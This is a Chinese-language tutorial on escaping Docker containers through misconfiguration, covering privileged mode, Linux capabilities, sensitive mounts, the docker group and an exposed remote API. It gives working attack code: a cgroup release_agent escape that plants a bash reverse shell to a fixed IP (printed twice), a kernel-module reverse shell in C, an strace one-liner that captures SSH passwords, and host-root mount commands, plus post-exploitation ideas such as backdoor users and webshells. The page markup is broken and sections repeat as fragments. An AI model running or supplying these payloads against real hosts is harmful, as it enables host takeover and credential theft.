容器逃逸——配置不当详解<\/h1>

0x00 引言<\/h2>
容器逃逸是指攻击者从容器内部突破隔离限制，获取宿主机权限的过程。当容器权限配置不当或挂载敏感目录时，这些错误配置为攻击者提供了利用机会。本文将详细分析因配置不当导致的容器逃逸技术。<\/p>

0x01 特权模式逃逸<\/h2>

1. Linux Capabilities机制<\/h3>

Capabilities是一种细粒度的权限控制机制，将root超级权限拆分为多个独立的能力模块，允许进程按需获取特定权限而非完整的root权限。<\/p>

查看容器拥有的Capabilities：

grep Cap \/proc\/1\/status
<\/span><\/span>capsh --print
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
2. Privileged模式<\/h3>
当容器以--privileged=true<\/code>参数运行时，容器与宿主机共享内核，可直接访问宿主机设备和内核。<\/p>
检测方法<\/strong>：<\/p>
cat \/proc\/self\/status | grep CapEff
<\/span><\/span># 若值为0000003fffffffff或0000001fffffffff则处于特权模式<\/span>
<\/span><\/span><\/code><\/pre>利用方法<\/strong>：<\/p>

查看宿主机磁盘信息：
fdisk -l
<\/span><\/span><\/code><\/pre><\/li>
挂载宿主机文件系统：
mkdir \/tmp\/test
<\/span><\/span>mount \/dev\/sda1 \/tmp\/test
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
后利用技术<\/strong>：<\/p>

写入宿主机公私钥<\/li>
写入宿主机计划任务<\/li>
写入后门用户<\/li>
搜索宿主机敏感文件<\/li>
写入WebShell<\/li>
<\/ul>
3. CAP_SYS_ADMIN<\/h3>
允许执行挂载文件系统、修改系统时钟等操作。<\/p>
利用方法<\/strong>：<\/p>
mkdir \/tmp\/cgrp &&<\/span> mount -t cgroup -o rdma cgroup \/tmp\/cgrp &&<\/span> mkdir \/tmp\/cgrp\/x
<\/span><\/span>echo 1<\/span> > \/tmp\/cgrp\/x\/notify_on_release
<\/span><\/span>host_path=<\/span>`<\/span>sed -n 's\/.*\perdir=1\/p'<\/span> \/etc\/mtab`<\/span>
<\/span><\/span>echo "<\/span>$host_path\/breakout"<\/span> > \/tmp\/cgrp\/release_agent
<\/span><\/span>echo '#!\/bin\/bash'<\/span> > \/breakout
<\/span><\/span>echo 'bash -i >& \/dev\/tcp\/192.168.1.54\/9999 0>&1'<\/span> >> \/breakout
<\/span><\/span>chmod a+x \/breakout
<\/span><\/span>sh -c "echo \$\$ > \/tmp\/cgrp\/x\/cgroup.procs"<\/span>
<\/span><\/span><\/code><\/pre>4. CAP_SYS_PTRACE<\/h3>
允许调试追踪任意进程，可读取或修改其他进程内存。<\/p>
利用方法<\/strong>：<\/p>

抓取SSH密码：
strace -f -F -p `<\/span>ps aux | grep "sshd -D"<\/span> | grep -v grep | awk {<\/span>'print $2'<\/span>}<\/span>`<\/span> -t -e trace=<\/span>read,write -s 32<\/span> 2<\/span> > sshd.log
<\/span><\/span>grep -E 'read\(6, ".+\\0\\0\\0\\.+"'<\/span> sshd.log
<\/span><\/span><\/code><\/pre><\/li>
进程注入获取Shell<\/li>
<\/ol>
5. CAP_SYS_MODULE<\/h3>
允许加载或卸载内核模块。<\/p>
利用方法<\/strong>：<\/p>

创建revshell.c：
#include<\/span> <linux\/kmod.h><\/span>
<\/span><\/span><\/span>#include<\/span> <linux\/module.h><\/span>
<\/span><\/span><\/span><\/span>MODULE_LICENSE("GPL"<\/span>);
<\/span><\/span>char<\/span>*<\/span> argv[] =<\/span> {"\/bin\/bash"<\/span>,"-c"<\/span>,"bash -i >& \/dev\/tcp\/host\/port 0>&1"<\/span>, NULL};
<\/span><\/span>static<\/span> char<\/span>*<\/span> envp[] =<\/span> {"PATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin"<\/span>, NULL };
<\/span><\/span>static<\/span> int<\/span> __init reverse_shell_init<\/span>(void<\/span>) {
<\/span><\/span>  return<\/span> call_usermodehelper(argv[0<\/span>], argv, envp, UMH_WAIT_EXEC);
<\/span><\/span>}
<\/span><\/span>static<\/span> void<\/span> __exit reverse_shell_exit<\/span>(void<\/span>) {
<\/span><\/span>  printk(KERN_INFO "Exiting<\/span>\n<\/span>"<\/span>);
<\/span><\/span>}
<\/span><\/span>module_init(reverse_shell_init);
<\/span><\/span>module_exit(reverse_shell_exit);
<\/span><\/span><\/code><\/pre><\/li>
编译并加载模块<\/li>
<\/ol>
6. CAP_DAC_READ_SEARCH(Shocker)<\/h3>
允许绕过文件读权限检查。<\/p>
利用方法<\/strong>：<\/p>

下载并编译shocker.c<\/li>
执行生成的a.out读取宿主机文件<\/li>
<\/ol>
0x02 不安全的挂载<\/h2>
1. Procfs挂载<\/h3>
procfs是Linux虚拟文件系统，展示系统内核和进程信息。<\/p>
利用方法<\/strong>：<\/p>

挂载宿主机core_pattern：
docker run -it -v \/proc\/sys\/kernel\/core_pattern:\/host\/proc\/sys\/kernel\/core_pattern ubuntu:18.04 bash
<\/span><\/span><\/code><\/pre><\/li>
利用core_pattern执行命令<\/li>
<\/ol>
2. CGroup挂载<\/h3>
劫持宿主机CGroup的release_agent文件实现逃逸。<\/p>
利用方法<\/strong>：<\/p>
mkdir \/tmp\/cgrp &&<\/span> mount -t cgroup -o rdma cgroup \/tmp\/cgrp &&<\/span> mkdir \/tmp\/cgrp\/x
<\/span><\/span>echo 1<\/span> > \/tmp\/cgrp\/x\/notify_on_release
<\/span><\/span>host_path=<\/span>`<\/span>sed -n 's\/.*\perdir=1\/p'<\/span> \/etc\/mtab`<\/span>
<\/span><\/span>echo "<\/span>$host_path\/breakout"<\/span> > \/tmp\/cgrp\/release_agent
<\/span><\/span>echo '#!\/bin\/bash'<\/span> > \/breakout
<\/span><\/span>echo 'bash -i >& \/dev\/tcp\/192.168.1.54\/9999 0>&1'<\/span> >> \/breakout
<\/span><\/span>chmod a+x \/breakout
<\/span><\/span>sh -c "echo \$\$ > \/tmp\/cgrp\/x\/cgroup.procs"<\/span>
<\/span><\/span><\/code><\/pre>3. Docker Socket挂载<\/h3>
挂载\/var\/run\/docker.sock可控制宿主机Docker Daemon。<\/p>
利用方法<\/strong>：<\/p>

创建特权容器：
docker -H unix:\/\/\/var\/run\/docker.sock run --privileged -it --rm -v \/:\/host ubuntu bash
<\/span><\/span><\/code><\/pre><\/li>
挂载宿主机根目录<\/li>
<\/ol>
4. lxcfs挂载<\/h3>
当容器挂载了lxcfs目录时可能包含可写的cgroup目录。<\/p>
0x03 其他风险点<\/h2>
1. 信息泄漏<\/h3>
搜索容器中的敏感信息：<\/p>

环境变量<\/li>
凭证信息<\/li>
配置文件<\/li>
Dockerfile和docker-compose.yaml<\/li>
<\/ul>
2. Docker提权<\/h3>
非root用户在docker组中可获取root权限：<\/p>
docker run -v \/:\/host -it ubuntu chroot \/host bash
<\/span><\/span><\/code><\/pre>3. Remote API未授权<\/h3>
开启远程API访问可能导致未授权访问：<\/p>
curl http:\/\/x.x.x.x:2375\/info
<\/span><\/span>docker -H tcp:\/\/x.x.x.x:2375 info
<\/span><\/span><\/code><\/pre>利用方法<\/strong>：<\/p>

创建特权容器<\/li>
挂载宿主机根目录<\/li>
<\/ol>
4. 容器安全扫描<\/h3>
推荐扫描工具：<\/p>

Clair<\/li>
SlimToolkit<\/li>
Anchore Engine<\/li>
<\/ul>
参考资源<\/h2>

Linux Capabilities利用指南<\/a><\/li>
Docker容器逃逸方法论<\/a><\/li>
容器逃逸检测指南<\/a><\/li>
<\/ol>

容器逃逸——配置不当详解<\/h1>

0x00 引言<\/h2> 容器逃逸是指攻击者从容器内部突破隔离限制，获取宿主机权限的过程。当容器权限配置不当或挂载敏感目录时，这些错误配置为攻击者提供了利用机会。本文将详细分析因配置不当导致的容器逃逸技术。<\/p>

0x01 特权模式逃逸<\/h2>

0x02 不安全的挂载<\/h2>

4. lxcfs挂载<\/h3> 当容器挂载了lxcfs目录时可能包含可写的cgroup目录。<\/p>

0x03 其他风险点<\/h2>

4. 容器安全扫描<\/h3> 推荐扫描工具：<\/p> Clair<\/li> SlimToolkit<\/li> Anchore Engine<\/li> <\/ul> 参考资源<\/h2> Linux Capabilities利用指南<\/a><\/li> Docker容器逃逸方法论<\/a><\/li> 容器逃逸检测指南<\/a><\/li> <\/ol>

参考资源<\/h2> Linux Capabilities利用指南<\/a><\/li> Docker容器逃逸方法论<\/a><\/li> 容器逃逸检测指南<\/a><\/li> <\/ol>

0x00 引言<\/h2>
容器逃逸是指攻击者从容器内部突破隔离限制，获取宿主机权限的过程。当容器权限配置不当或挂载敏感目录时，这些错误配置为攻击者提供了利用机会。本文将详细分析因配置不当导致的容器逃逸技术。<\/p>

4. lxcfs挂载<\/h3>
当容器挂载了lxcfs目录时可能包含可写的cgroup目录。<\/p>

4. 容器安全扫描<\/h3>
推荐扫描工具：<\/p>

Clair<\/li>
SlimToolkit<\/li>
Anchore Engine<\/li> <\/ul>
参考资源<\/h2>

Linux Capabilities利用指南<\/a><\/li>
Docker容器逃逸方法论<\/a><\/li>
容器逃逸检测指南<\/a><\/li> <\/ol>

参考资源<\/h2>

Linux Capabilities利用指南<\/a><\/li>
Docker容器逃逸方法论<\/a><\/li>
容器逃逸检测指南<\/a><\/li> <\/ol>